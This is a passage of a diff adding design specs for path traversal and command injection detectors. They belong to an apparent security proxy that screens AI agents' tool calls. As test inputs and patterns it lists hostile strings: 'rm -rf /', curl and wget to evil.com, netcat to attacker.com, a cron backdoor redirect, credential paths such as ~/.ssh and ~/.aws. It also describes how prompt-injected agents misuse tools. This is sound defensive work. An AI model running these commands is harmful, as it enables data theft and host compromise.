+2. Call `detect(tool_call)` for each enabled detector
+3. If any returns `matched=True`, short-circuit to `Decision(action="block", matched_detector=result.detector_name, message=result.detail)`
+4. Detectors run before all policy rules (step 1 in the decision stack)
+
+The `detect` function signature — `detect(tool_call: ToolCall) -> DetectorResult` — is the contract. All 5 non-chain detectors (#21–#25) use this exact same signature.
+
+---
+
+## 10. Design Constraints for Downstream Issues
+
+1. **`detect()` signature is the contract.** All detectors export `detect(tool_call: ToolCall) -> DetectorResult`. Issue #26 depends on this. Do not deviate.
+
+2. **`_extract_strings()` should be shared.** Issues #22 (path traversal), #23 (command injection), and #25 (secrets) all need to scan string values in arguments. Extract `_extract_strings` into a shared utility in `detectors/__init__.py` or a `detectors/_utils.py` module. For this issue, implement it locally. Issue #26 can refactor to shared when wiring all detectors together.
+
+3. **Patterns are compiled at import time.** Module-level `re.compile()` ensures zero regex compilation at detection time. The engine calls `detect()` on every `tools/call` request — regex compilation per call would add measurable latency.
+
+4. **`detector_name` must match the config key.** `DetectorResult.detector_name == "sql_injection"` must match the key in `DetectorsConfig` and the `REGISTRY` dict in `detectors/__init__.py`. This is how the engine maps a detector match back to the config toggle.
+
+---
+
+## 11. File Inventory
+
+| File | Status | Contents |
+|------|--------|----------|
+| `src/agentgate/detectors/sql_injection.py` | **Replace stub** | `_extract_strings()`, `_SQL_PATTERNS`, `detect()` |
+| `tests/test_detectors/test_sql_injection.py` | **Replace stub** | 16 tests (7 positive + 7 negative + 2 edge cases) |
+
+No other files are touched. `models.py`, `engine.py`, `proxy.py`, `detectors/__init__.py` are unchanged by this issue.
+
+---
+
+## 12. Definition of Done
+
+- [ ] `src/agentgate/detectors/sql_injection.py` contains `detect(tool_call: ToolCall) -> DetectorResult`
+- [ ] All 7 Tier 1 destructive SQL patterns detected (DROP, DELETE FROM, TRUNCATE, ALTER TABLE, UPDATE...SET, INSERT INTO, EXEC)
+- [ ] All 4 Tier 2 injection indicators detected (UNION SELECT, OR tautology, stacked + comment, stacked + destructive)
+- [ ] Benign SELECT statements NOT flagged
+- [ ] English prose with SQL-like words NOT flagged
+- [ ] Nested dict and list argument values scanned recursively
+- [ ] Case-insensitive matching (mixed-case evasion caught)
+- [ ] `DetectorResult.detail` includes param path and matched pattern label
+- [ ] `tests/test_detectors/test_sql_injection.py` contains 16 tests, all passing
+- [ ] Zero false positives on all negative test cases
+- [ ] No async code — pure synchronous function
+- [ ] No dependency beyond `models.py` and stdlib `re`
+- [ ] All existing tests (69 from PR1) still pass
+- [ ] All tests run in under 1 second (pure functions, no I/O)

--- a/docs/issue-22-path-traversal-detector-spec.md
+++ b/docs/issue-22-path-traversal-detector-spec.md
@@ -1,0 +1,370 @@
+# Issue #22: Implement path_traversal Detector
+
+**Status:** Implementation-ready  
+**Milestone:** PR2 — Policy Engine + Detectors + Audit  
+**Depends on:** None (standalone detector, uses existing `ToolCall` and `DetectorResult` models)  
+**Blocks:** #26 (wire detectors into registry + engine), #15 (acceptance tests — AT-1 specifically)  
+**Target file:** `src/agentgate/detectors/path_traversal.py`  
+**Test file:** `tests/test_detectors/test_path_traversal.py`  
+**Estimated effort:** 2–3 hours  
+**Ref:** MVP Spec Section 3 (detector table), Section 6 AT-1 (path traversal block), Section 12 scenarios A1–A3/A13
+
+---
+
+## 1. Objective
+
+Implement the `path_traversal` detector. This detector scans all string parameter values in a tool call for path traversal indicators: `../` sequences (including encoded variants), absolute paths targeting sensitive system directories, tilde-based home directory access, and null byte injection.
+
+This detector is the most important for the golden path demo. AT-1 (the first acceptance test) requires it. It directly maps to OWASP ASI02 (Tool Misuse) and is exercised by 4 of the 15 adversarial evaluation scenarios (A1, A2, A3, A13).
+
+---
+
+## 2. Contract
+
+```python
+def detect(tool_call: ToolCall) -> DetectorResult
+```
+
+Same signature as `sql_injection.detect()`. Reuse the `_extract_strings()` helper pattern from `sql_injection.py` — recursively walk the arguments dict and extract all `(key_path, string_value)` pairs. Scan each string value against the pattern list. Return on first match.
+
+**Return values:**
+- `DetectorResult(matched=True, detector_name="path_traversal", detail="...")` — first pattern hit
+- `DetectorResult(matched=False, detector_name="path_traversal")` — no patterns matched
+
+---
+
+## 3. Detection Patterns
+
+Three categories of patterns, checked in order:
+
+### 3.1 Traversal sequences
+
+These catch explicit directory traversal attempts.
+
+| Pattern | What it catches | Example |
+|---------|----------------|---------|
+| `../` literal | Basic relative traversal | `../../etc/passwd` |
+| `..\` literal | Windows-style traversal | `..\..\windows\system32` |
+| `%2e%2e%2f` / `%2e%2e/` | URL-encoded traversal | `%2e%2e%2fetc/passwd` |
+| `%2e%2e%5c` | URL-encoded backslash variant | `%2e%2e%5cwindows` |
+
+**Implementation:** Case-insensitive substring check. A single regex covering all four:
+
+```
+\.\./|\.\.\\|%2e%2e(%2f|/|%5c|\\)
+```
+
+Flags: `re.IGNORECASE`
+
+### 3.2 Sensitive absolute paths
+
+These catch direct access to known-sensitive system locations, regardless of whether traversal sequences are present.
+
+| Pattern | What it catches |
+|---------|----------------|
+| `/etc/` | System config files (passwd, shadow, hosts) |
+| `/root/` | Root home directory |
+| `/proc/` | Process information (Linux) |
+| `/sys/` | Kernel/device info (Linux) |
+| `/var/log/` | System logs |
+| `/dev/` | Device files |
+| `~/.ssh/` or `~/.ssh` | SSH keys (any user) |
+| `~/.aws/` or `~/.aws` | AWS credentials |
+| `~/.gnupg/` or `~/.gnupg` | GPG keys |
+| `~/.bashrc`, `~/.bash_history`, `~/.profile`, `~/.zshrc` | Shell configs/history |
+| `/home/` followed by `/.ssh/` or `/.aws/` | Expanded tilde paths |
+
+**Implementation:** Two regex patterns:
+
+1. **Absolute sensitive dirs** — match at any position in the string (the path may be embedded in a longer argument):
+   ```
+   (?:^|/)(?:etc|root|proc|sys|dev)/|/var/log/
+   ```
+   But be careful: this must match `/etc/passwd` but NOT `/data/workspace/etc_report.csv`. The pattern needs a path separator before `etc`, `root`, etc. Use:
+   ```
+   (?:^|(?<=/))(?:etc|root|proc|sys|dev)/|(?:^|(?<=/))var/log/
+   ```
+   Actually, simpler approach — match these as substrings that look like path components:
+   ```
+   (?:^|/)etc/|(?:^|/)root/|(?:^|/)proc/|(?:^|/)sys/|(?:^|/)dev/|(?:^|/)var/log/
+   ```
+
+2. **Tilde paths** — home directory expansion:
+   ```
+   ~[^/]*?/\.(ssh|aws|gnupg)|~/\.(bashrc|bash_history|profile|zshrc|bash_profile)
+   ```
+
+3. **Expanded home paths** — `/home/<user>/.ssh/` etc:
+   ```
+   /home/[^/]+/\.(ssh|aws|gnupg)
+   ```
+
+### 3.3 Null byte injection
+
+Null bytes in file paths can truncate path validation while the underlying OS processes the full path.
+
+| Pattern | What it catches |
+|---------|----------------|
+| `%00` | URL-encoded null byte |
+| `\x00` | Literal null byte (if somehow present in JSON string) |
+| `\0` | C-style null representation |
+
+**Implementation:** Substring check for `%00`, and also check for actual null bytes in the string (`\x00` character).
+
+---
+
+## 4. Design Decisions
+
+### 4.1 No "allowed directory" configuration in the detector
+
+The detector does NOT take an "allowed directory" parameter. It flags universally-dangerous paths (system dirs, SSH keys, traversal sequences). The policy's `param_rule` with `starts_with` handles project-specific sandboxing (e.g., "must start with `/data/workspace/`").
+
+**Why:** Detectors are stateless, config-free pattern matchers. They run before policy rules. Mixing allowed-path logic into the detector would create a confusing overlap with `param_rule`. The separation is clean: detector catches known-bad patterns, `param_rule` enforces known-good boundaries.
+
+### 4.2 Conservative on false positives
+
+The biggest risk for this detector is flagging strings that contain path-like substrings in non-path contexts. Examples:
+- A CSV cell containing `/etc/timezone` as data content
+- A string like `"this is 3/4 of the report"` matching nothing (no `../`)
+- A URL like `https://example.com/dev/docs` containing `/dev/`
+
+**Mitigations:**
+- `/dev/` pattern requires it to look like a filesystem path, not a URL path. Check that the string doesn't start with `http://` or `https://` before flagging `/dev/`, `/etc/`, etc. Actually — this gets complicated. Simpler: accept the false positive risk on `/dev/` in URLs and document it. The FPR target is ≤10%, and this edge case is unlikely in practice.
+- Better mitigation: only flag these sensitive dirs when they appear at the **start** of the string value or immediately after a path separator that isn't part of a URL scheme. But this gets regex-heavy.
+
+**Final decision:** Keep it simple. Flag `../` and `..\\` aggressively (these are almost never benign in tool call params). For sensitive absolute paths, require them to appear path-like: preceded by start-of-string, `/`, or whitespace. Accept that a string like `/data/workspace/etc/report.csv` will NOT be flagged (the `/etc/` is mid-path but preceded by a legitimate directory name — the regex `(?:^|/)etc/` would match this, which is wrong).
+
+**Revised approach for sensitive dirs:** Match these patterns only when they appear as the **start of the string** or after `../` traversal. The purpose of the sensitive-dir patterns is to catch direct access like `path="/etc/passwd"` and traversals like `path="/data/workspace/../../../etc/passwd"`. If someone has a legitimate directory named `etc` inside their workspace, the `param_rule` sandbox check handles the boundary — not this detector.
+
+Simplest correct implementation:
+
+```python
+_SENSITIVE_PATH_PREFIXES = [
+    "/etc/", "/root/", "/proc/", "/sys/", "/dev/", "/var/log/",
+    "~/.ssh", "~/.aws", "~/.gnupg",
+    "~/.bashrc", "~/.bash_history", "~/.profile", "~/.zshrc", "~/.bash_profile",
+]
+```
+
+Check: does the string **start with** any of these, OR does the string **contain** `../` (handled by category 3.1)?
+
+For `/home/<user>/.ssh` style, use a regex: `^/home/[^/]+/\.(?:ssh|aws|gnupg)`.
+
+This avoids the mid-path false positive problem entirely. If the path is `/data/workspace/etc/report.csv`, it doesn't start with `/etc/` so it passes. If it's `/etc/passwd`, it starts with `/etc/` so it's caught. If it's `../../etc/passwd`, the `../` pattern catches it first.
+
+### 4.3 Reuse `_extract_strings` from sql_injection
+
+Copy the `_extract_strings` helper. In Issue #26 (wire detectors), we can refactor it into a shared utility. For now, each detector is self-contained with its own copy — matches the existing `sql_injection.py` pattern.
+
+---
+
+## 5. Implementation Plan
+
+### 5.1 `src/agentgate/detectors/path_traversal.py`
+
+```python
+"""Path traversal detector — flags ../ sequences, sensitive absolute paths, and null byte injection."""
+
+from __future__ import annotations
+
+import re
+from typing import Any
+
+from agentgate.models import DetectorResult, ToolCall
+
+
+def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
+    """Recursively extract all (key_path, string_value) pairs from arguments."""
+    # Same implementation as sql_injection.py
+
+
+# --- Pattern categories ---
+
+# Category 1: Traversal sequences
+_TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e(?:%2f|/|%5c|\\)", re.IGNORECASE)
+
+# Category 2: Sensitive path prefixes (checked at start of string value)
+_SENSITIVE_PREFIXES: list[str] = [
+    "/etc/", "/root/", "/proc/", "/sys/", "/dev/", "/var/log/",
+    "~/.ssh", "~/.aws", "~/.gnupg",
+    "~/.bashrc", "~/.bash_history", "~/.profile", "~/.zshrc", "~/.bash_profile",
+]
+
+# Category 2b: /home/<user>/.<sensitive_dir> pattern
+_HOME_SENSITIVE_RE = re.compile(r"^/home/[^/]+/\.(?:ssh|aws|gnupg)")
+
+# Category 3: Null byte injection
+_NULL_BYTE_RE = re.compile(r"%00|\\x00|\\0")
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for path traversal indicators."""
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        # Category 1: Traversal sequences (../  ..\ and encoded variants)
+        if _TRAVERSAL_RE.search(value):
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Path traversal sequence in param '{param_path}'",
+            )
+
+        # Category 2: Sensitive absolute path prefixes
+        for prefix in _SENSITIVE_PREFIXES:
+            if value.startswith(prefix):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="path_traversal",
+                    detail=f"Sensitive path prefix '{prefix}' in param '{param_path}'",
+                )
+
+        # Category 2b: /home/<user>/.ssh etc
+        if _HOME_SENSITIVE_RE.search(value):
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Sensitive home directory path in param '{param_path}'",
+            )
+
+        # Category 3: Null byte injection
+        if _NULL_BYTE_RE.search(value) or "\x00" in value:
+            return DetectorResult(
+                matched=True,
+                detector_name="path_traversal",
+                detail=f"Null byte injection in param '{param_path}'",
+            )
+
+    return DetectorResult(matched=False, detector_name="path_traversal")
+```
+
+**Key implementation notes:**
+- `_SENSITIVE_PREFIXES` uses `str.startswith()`, not regex — faster and clearer
+- `_TRAVERSAL_RE` catches `../`, `..\`, `%2e%2e/`, `%2e%2e%2f`, `%2e%2e\`, `%2e%2e%5c`
+- `_NULL_BYTE_RE` catches encoded null bytes; `"\x00" in value` catches literal null bytes
+- Return on first match (same as sql_injection — fail-fast)
+
+---
+
+## 6. Test Plan
+
+### 6.1 Test file: `tests/test_detectors/test_path_traversal.py`
+
+All tests are **sync, no I/O** — they construct `ToolCall` objects directly and call `detect()`.
+
+### 6.2 Positive cases (must match — 8 tests)
+
+| # | Test name | Tool call | Why it should match |
+|---|-----------|-----------|-------------------|
+| P1 | `test_relative_traversal_etc_passwd` | `read_file(path="../../etc/passwd")` | Classic `../` traversal |
+| P2 | `test_absolute_etc_shadow` | `read_file(path="/etc/shadow")` | Direct sensitive path access |
+| P3 | `test_tilde_ssh_key` | `read_file(path="~/.ssh/id_rsa")` | SSH key access via tilde |
+| P4 | `test_traversal_from_allowed_dir` | `read_file(path="/data/workspace/../../../etc/passwd")` | Traversal that starts in allowed dir then escapes |
+| P5 | `test_proc_self_environ` | `read_file(path="/proc/self/environ")` | Process environment leak |
+| P6 | `test_url_encoded_traversal` | `read_file(path="%2e%2e%2f%2e%2e%2fetc/passwd")` | Encoded `../` bypass attempt |
+| P7 | `test_null_byte_injection` | `read_file(path="/data/workspace/safe%00../../etc/passwd")` | Null byte truncation trick |
+| P8 | `test_home_user_ssh` | `read_file(path="/home/ubuntu/.ssh/authorized_keys")` | Expanded home dir SSH access |
+
+### 6.3 Negative cases (must NOT match — 7 tests)
+
+| # | Test name | Tool call | Why it should pass |
+|---|-----------|-----------|-------------------|
+| N1 | `test_safe_absolute_path` | `read_file(path="/data/workspace/reports/q4.csv")` | Normal file in allowed dir |
+| N2 | `test_safe_relative_path` | `read_file(path="./local_file.txt")` | Benign relative path |
+| N3 | `test_dotdot_in_non_path_string` | `send_email(body="revenue grew 3/4 vs ../last quarter")` | `../` appears in natural language but this is a non-path string — **wait, this WILL match**. See decision below. |
+| N4 | `test_safe_nested_dir` | `read_file(path="/data/workspace/etc/report.csv")` | Dir named `etc` inside workspace — not `/etc/` |
+| N5 | `test_no_string_params` | `list_directory(recursive=true, depth=3)` | No string params to scan |
+| N6 | `test_empty_arguments` | `read_file()` (empty args) | No arguments at all |
+| N7 | `test_safe_absolute_path_deep` | `read_file(path="/data/workspace/subdir/another/file.md")` | Deep but safe path |
+
+### 6.4 N3 decision: `../` in non-path strings
+
+The detector scans **all** string params, not just ones named `path`. This means `send_email(body="see ../last quarter")` WILL trigger the `../` pattern.
+
+**Accept this.** Here's why:
+- The detector is intentionally aggressive on `../` — it's a traversal indicator regardless of context
+- In practice, `../` appearing in email bodies or non-path params is rare
+- The cost of a false negative (missing a traversal) is much higher than a false positive (blocking a weird email body)
+- If this becomes a real FPR problem, v1 can add a heuristic: only flag `../` if the string looks path-like (contains `/` or `\` as path separators beyond the `../` itself)
+
+**Revised N3:** Change the negative test to something that genuinely won't match:
+
+| N3 | `test_slash_in_non_traversal_context` | `send_email(body="profits grew quarter/quarter")` | Forward slash but no `../` pattern |
+
+### 6.5 Edge cases (2 tests)
+
+| # | Test name | Tool call | Expected |
+|---|-----------|-----------|----------|
+| E1 | `test_nested_arg_traversal` | `write_file(options={"backup_path": "../../tmp/backup"})` | Match — traversal in nested dict |
+| E2 | `test_windows_backslash_traversal` | `read_file(path="..\\..\\windows\\system32\\config\\sam")` | Match — Windows-style traversal |
+
+### 6.6 Test count: 17 total (8 positive + 7 negative + 2 edge)
+
+This follows the `sql_injection` pattern (16 tests: 7 positive + 7 negative + 2 edge) but slightly larger because path traversal has more pattern categories.
+
+---
+
+## 7. Acceptance Test Mapping
+
+This detector is required by **AT-1** from the spec:
+
+> **AT-1: Path Traversal Block**  
+> Agent calls `read_file(path="/etc/passwd")` with a policy that restricts filesystem access to `/data/workspace/`.  
+> Expected: Call is blocked. Audit log records with `matched_detector: path_traversal`.
+
+AT-1 requires both the detector AND a `param_rule`. The detector catches `/etc/passwd` via the sensitive prefix check. The `param_rule` (Issue #8) would also catch it via `starts_with /data/workspace/ + negate`. Defense in depth — both should fire, but detectors run first (step 1 in the decision stack) and short-circuit.
+
+This detector also covers adversarial eval scenarios A1, A2, A3, A13:
+- A1: `read_file(path="/etc/passwd")` — sensitive prefix
+- A2: `read_file(path="../../.ssh/id_rsa")` — traversal + tilde-like
+- A3: `read_file(path="/data/workspace/../../../etc/shadow")` — traversal
+- A13: `read_file(path="/data/workspace/~/.bashrc")` — this is a weird one; it's not actually a tilde expansion since it's mid-path. The `~/.bashrc` prefix check won't fire because the string doesn't start with `~/`. This scenario may need to be re-evaluated at eval time — it might rely on `param_rule` rather than the detector.
+
+---
+
+## 8. Risk: False Positives
+
+**Primary FPR concern:** `../` in non-path string parameters (email bodies, descriptions, notes).
+
+**Likelihood:** Low in practice. Tool call arguments are typically structured — path params contain paths, email params contain email content. Natural language rarely contains `../`.
+
+**Mitigation if FPR becomes a problem (v1):**
+- Add a path-likeness heuristic: only flag `../` if the string also contains `/` or `\` as path separators (beyond the `../` itself)
+- Or: allow detectors to be scoped to specific param names in the policy config
+
+**For MVP:** Ship the aggressive version. Measure FPR in the evaluation suite (10 benign scenarios). If FPR > 0 on the benign suite, tighten the patterns before merge.
+
+---
+
+## 9. What This Does NOT Cover
+
+- **Symlink traversal** — requires filesystem access, not static analysis
+- **Path canonicalization** — we don't resolve `./`, `//`, or symlinks. We flag the patterns.
+- **Allowed directory enforcement** — that's `param_rule` (Issue #8), not this detector
+- **Response scanning** — checking if a tool's response contains file contents from sensitive paths (deferred to v1)
+- **Unicode/punycode path tricks** — v1 enhancement
+
+---
+
+## 10. Files Changed
+
+| File | Action | What |
+|------|--------|------|
+| `src/agentgate/detectors/path_traversal.py` | Rewrite from stub | Full detector implementation |
+| `tests/test_detectors/test_path_traversal.py` | Create new | 17 tests |
+
+No changes to any other files. The detector is self-contained. Wiring into the engine happens in Issue #26.
+
+---
+
+## 11. Definition of Done
+
+- [ ] `detect(tool_call)` returns `DetectorResult(matched=True, detector_name="path_traversal", detail=...)` for all traversal, sensitive path, and null byte patterns
+- [ ] `detect(tool_call)` returns `DetectorResult(matched=False, detector_name="path_traversal")` for safe paths
+- [ ] Recursive string extraction handles nested dicts and lists (same as sql_injection)
+- [ ] 8 positive tests pass (traversal, absolute sensitive, tilde, encoded, null byte, home dir)
+- [ ] 7 negative tests pass (safe paths, non-path strings, no-string params, empty args)
+- [ ] 2 edge case tests pass (nested args, Windows backslash)
+- [ ] All 17 tests are sync, no I/O, no fixtures beyond `ToolCall` construction
+- [ ] All existing tests still pass (72 total: 11 models + 12 parser + 10 policy + 10 engine + 5 proxy + 8 proxy_policy + 16 sql_injection)
+- [ ] Zero benign test suite false positives (manually verify B1, B2, B3, B6, B8, B9 from eval plan pass through this detector)

--- a/docs/issue-23-command-injection-detector-spec.md
+++ b/docs/issue-23-command-injection-detector-spec.md
@@ -1,0 +1,321 @@
+# Issue #23: Implement Command Injection Detector
+
+**Status:** Implementation-ready  
+**Milestone:** PR2 — Policy Engine + Detectors + Audit  
+**Depends on:** None (standalone detector, no module dependencies beyond `models.py`)  
+**Blocks:** #26 (wire detectors into registry + engine)  
+**Target file:** `src/agentgate/detectors/command_injection.py`  
+**Test file:** `tests/test_detectors/test_command_injection.py`  
+**Estimated effort:** 1.5–2 hours  
+**Ref:** MVP Spec Section 3 (detector table), Section 10 (Day 4 checklist), Evaluation A4
+
+---
+
+## 1. Objective
+
+Implement a command injection detector that flags shell metacharacters in tool call string parameters. This detector catches the attack pattern where an LLM agent, tricked via prompt injection, passes shell-interpreted characters through tool arguments — enabling arbitrary command execution on the host running the MCP server.
+
+This is one of six detectors in the pipeline. It follows the same contract as `sql_injection.py` and `path_traversal.py`: a single `detect(tool_call: ToolCall) -> DetectorResult` function, pure synchronous, no I/O.
+
+---
+
+## 2. What This Detector Catches (OWASP ASI02)
+
+An agent calling a tool like `execute_command(cmd="ls; rm -rf /")` or `write_file(path="output.txt && curl evil.com/exfil")`. The MCP server may pass these arguments to a subprocess or shell, and shell metacharacters in the value would be interpreted as additional commands.
+
+**Attack surface:** Any string parameter value that ends up in a shell context on the MCP server side. AgentGate doesn't know which params are shell-executed, so it scans all string values.
+
+---
+
+## 3. Detection Categories
+
+Three categories, matching the pattern established by `sql_injection.py` and `path_traversal.py`:
+
+### Category 1: Shell Operator Injection
+
+Shell operators that chain or redirect commands. These are the primary injection vectors.
+
+| Pattern | What it enables | Example |
+|---------|----------------|---------|
+| `;` | Command chaining | `file.txt; rm -rf /` |
+| `&&` | Conditional chain (on success) | `file.txt && curl evil.com` |
+| `\|\|` | Conditional chain (on failure) | `file.txt \|\| wget evil.com` |
+| `\|` (pipe) | Pipe to another command | `file.txt \| nc attacker.com 4444` |
+| `>` / `>>` | Output redirection | `file.txt > /etc/cron.d/backdoor` |
+
+**Implementation:** Single regex matching `;`, `&&`, `||`, `|`, `>`, `>>` in context that suggests shell intent, not benign usage.
+
+### Category 2: Command Substitution
+
+Shell constructs that execute embedded commands.
+
+| Pattern | What it enables | Example |
+|---------|----------------|---------|
+| `` `...` `` | Backtick substitution | `` `whoami` `` |
+| `$(...)` | Dollar-paren substitution | `$(cat /etc/passwd)` |
+
+**Implementation:** Regex for backtick-wrapped content and `$(...)` patterns.
+
+### Category 3: Newline Injection
+
+Newline characters that can break out of a quoted argument in shell contexts.
+
+| Pattern | What it enables | Example |
+|---------|----------------|---------|
+| `\n` (literal newline in value) | Command on next line | `file.txt\nrm -rf /` |
+
+**Implementation:** Check for literal `\n` characters embedded in single-line parameter values.
+
+---
+
+## 4. The Hard Part: False Positives
+
+This detector has the highest false-positive risk of all five detectors. The characters `;`, `|`, `>`, `&` appear constantly in benign contexts:
+
+- `AT&T` — ampersand in company names
+- `Tom & Jerry` — ampersand in natural text
+- `price > 100` — comparison operators
+- `2025-Q1; Revenue Report` — semicolons in titles
+- `a|b|c` — pipe as separator/delimiter in data
+- `x > y ? a : b` — ternary-like syntax in programming strings
+- Markdown, HTML content with `>` for blockquotes or tags
+- URLs with `&` as query parameter separator (`?foo=1&bar=2`)
+
+### The design decision: require shell-context indicators
+
+**Do NOT flag bare metacharacters.** Flag metacharacters only when they appear alongside shell-context indicators — a word or pattern that looks like a command following the operator.
+
+Concretely:
+
+- `;` → flag only when followed by a word that could be a command: `; rm`, `; curl`, `; wget`, `; cat`, `; echo`, `; python`, `; sh`, `; bash`, `; nc`, `; chmod`, `; chown`, `; sudo`, or any path-like token (`; /bin/...`, `; ./...`)
+- `&&` → same: flag when followed by a command-like token
+- `||` → same
+- `|` → flag when followed by a command-like token (pipe to a command)
+- `>` / `>>` → flag when followed by a path-like token (`> /etc/...`, `>> /tmp/...`, `> ~/...`)
+- Backticks and `$(...)` → flag unconditionally. These have no benign use in tool call parameter values.
+- Newline → flag unconditionally (a literal newline embedded in a parameter value is suspicious)
+
+**Why this is the right tradeoff:** A developer passing `AT&T` to a tool should not be blocked. A developer (or injection-tricked agent) passing `file.txt && curl evil.com/exfil` should be. The distinguishing signal is whether a recognizable command or path follows the shell operator. This accepts that we'll miss novel/obscure commands, but catches the 95% case while keeping FPR at zero for the benign test suite.
+
+**What we explicitly miss (acceptable for MVP):**
+- Obfuscated commands: `; r''m -rf /` — encoded/split commands
+- Hex/octal escapes in shell: `$'\x72\x6d'` 
+- Env variable expansion: `${HOME}` (benign in most contexts)
+- Here-documents, process substitution (`<(...)`)
+- Commands not in the known-command list
+
+These are v1 enhancements if real-world evasion becomes a problem.
+
+---
+
+## 5. Implementation Spec
+
+### Module: `src/agentgate/detectors/command_injection.py`
+
+**Reuse `_extract_strings` from `sql_injection.py` and `path_traversal.py`.** Yes, this is the third copy. Refactoring to a shared utility is a legitimate cleanup task but NOT part of this issue — keep the three detectors self-contained for now. A `detectors/_util.py` extraction can happen in a cleanup pass after all five detectors are wired.
+
+### Pattern definitions
+
+```python
+# Category 1: Shell operators followed by command-like tokens
+# Matches: ; cmd, && cmd, || cmd, | cmd
+# "cmd" = known shell command or path-like token
+_KNOWN_COMMANDS = (
+    r"rm|curl|wget|cat|echo|sh|bash|zsh|python[23]?|perl|ruby|nc|ncat"
+    r"|chmod|chown|sudo|kill|pkill|dd|mkfifo|tee|xargs|find|grep|sed|awk"
+    r"|eval|exec|source|export|env|nohup|setsid"
+)
+
+# ; <cmd>  or  ; /<path>  or  ; ./<path>
+_SEMICOLON_CMD = re.compile(
+    rf";\s*(?:{_KNOWN_COMMANDS})\b|;\s*[./~]", re.IGNORECASE
+)
+
+# && <cmd>  or  && /<path>
+_AND_CMD = re.compile(
+    rf"&&\s*(?:{_KNOWN_COMMANDS})\b|&&\s*[./~]", re.IGNORECASE
+)
+
+# || <cmd>  or  || /<path>
+_OR_CMD = re.compile(
+    rf"\|\|\s*(?:{_KNOWN_COMMANDS})\b|\|\|\s*[./~]", re.IGNORECASE
+)
+
+# | <cmd>  (single pipe to a command)
+# Must NOT match || (handled above)
+_PIPE_CMD = re.compile(
+    rf"(?<!\|)\|\s*(?:{_KNOWN_COMMANDS})\b", re.IGNORECASE
+)
+
+# > or >> followed by a path-like target
+_REDIRECT = re.compile(
+    r">{1,2}\s*[/~.]", re.IGNORECASE
+)
+
+# Category 2: Command substitution — always suspicious
+_BACKTICK = re.compile(r"`[^`]+`")
+_DOLLAR_PAREN = re.compile(r"\$\([^)]+\)")
+
+# Category 3: Embedded newlines
+_NEWLINE = re.compile(r"\n")
+```
+
+### Detection function
+
+```python
+def detect(tool_call: ToolCall) -> DetectorResult:
+    strings = _extract_strings(tool_call.arguments)
+    
+    for param_path, value in strings:
+        for pattern, label in _PATTERNS:
+            if pattern.search(value):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="command_injection",
+                    detail=f"Command injection detected in param '{param_path}': {label}",
+                )
+    
+    return DetectorResult(matched=False, detector_name="command_injection")
+```
+
+Where `_PATTERNS` is a list of `(pattern, label)` tuples, same structure as `sql_injection.py`.
+
+### Labels for each pattern
+
+| Pattern | Label |
+|---------|-------|
+| `_SEMICOLON_CMD` | `"shell command after semicolon"` |
+| `_AND_CMD` | `"shell command after &&"` |
+| `_OR_CMD` | `"shell command after \|\|"` |
+| `_PIPE_CMD` | `"pipe to shell command"` |
+| `_REDIRECT` | `"output redirection to file"` |
+| `_BACKTICK` | `"backtick command substitution"` |
+| `_DOLLAR_PAREN` | `"$() command substitution"` |
+| `_NEWLINE` | `"embedded newline"` |
+
+---
+
+## 6. Test Plan
+
+### File: `tests/test_detectors/test_command_injection.py`
+
+All tests are sync, no I/O, no fixtures beyond `ToolCall` construction. Follow the exact pattern from `test_sql_injection.py` and `test_path_traversal.py`.
+
+### Positive cases (8 — must all match)
+
+| # | Test name | Tool call | Which pattern fires |
+|---|-----------|-----------|-------------------|
+| P1 | `test_semicolon_rm` | `execute(cmd="file.txt; rm -rf /")` | `_SEMICOLON_CMD` |
+| P2 | `test_and_curl` | `fetch(url="x && curl evil.com/exfil")` | `_AND_CMD` |
+| P3 | `test_or_wget` | `run(arg="\|\| wget evil.com/shell.sh")` | `_OR_CMD` |
+| P4 | `test_pipe_nc` | `process(input="file.txt \| nc attacker.com 4444")` | `_PIPE_CMD` |
+| P5 | `test_redirect_to_cron` | `write(data="payload > /etc/cron.d/backdoor")` | `_REDIRECT` |
+| P6 | `test_backtick_whoami` | `log(msg="user is \`whoami\`")` | `_BACKTICK` |
+| P7 | `test_dollar_paren_cat` | `display(text="$(cat /etc/passwd)")` | `_DOLLAR_PAREN` |
+| P8 | `test_embedded_newline` | `execute(cmd="ls\nrm -rf /")` | `_NEWLINE` |
+
+### Negative cases (7 — must all pass clean)
+
+| # | Test name | Tool call | Why it's benign |
+|---|-----------|-----------|----------------|
+| N1 | `test_ampersand_in_company_name` | `search(query="AT&T quarterly earnings")` | `&T` is not `&& <cmd>` |
+| N2 | `test_semicolon_in_text` | `write(content="Hello world; great to meet you")` | `;` not followed by a known command |
+| N3 | `test_pipe_in_data_separator` | `parse(format="csv\|tsv\|json")` | `\|` not followed by a known command |
+| N4 | `test_gt_in_comparison` | `query(filter="price > 100")` | `>` followed by number, not path |
+| N5 | `test_url_with_ampersands` | `fetch(url="https://api.com?a=1&b=2&c=3")` | URL query params, not `&&` |
+| N6 | `test_normal_filename` | `read(path="report_2026-Q1.csv")` | No metacharacters |
+| N7 | `test_email_with_pipe_in_body` | `send(body="Use A \| B notation for alternatives")` | Prose usage, `\|` not followed by command |
+
+### Edge cases (2)
+
+| # | Test name | Tool call | Expected |
+|---|-----------|-----------|----------|
+| E1 | `test_nested_args` | `execute(config={"script": "x; curl evil.com"})` | MATCH — nested string scanning |
+| E2 | `test_empty_args` | `execute()` (empty arguments dict) | NO MATCH — no crash |
+
+### Total: 17 tests (8 positive + 7 negative + 2 edge)
+
+---
+
+## 7. Design Decisions
+
+### D1: Context-aware pattern matching over bare character matching
+
+**Decision:** Require a known command or path after shell operators.  
+**Why:** Bare `;` matching would flag `"Q1; Revenue Report"` and destroy usability. The SQL injection detector had a similar decision — it doesn't flag standalone `SELECT`, only destructive patterns.  
+**Tradeoff:** We miss injections using unknown or obfuscated commands. Acceptable for MVP.
+
+### D2: Backticks and `$()` are unconditionally flagged
+
+**Decision:** No context requirement for command substitution patterns.  
+**Why:** There is no benign reason for a tool call parameter value to contain `` `whoami` `` or `$(cat /etc/passwd)`. Unlike `;` and `|`, these constructs exist exclusively for command execution. Zero expected false positives.
+
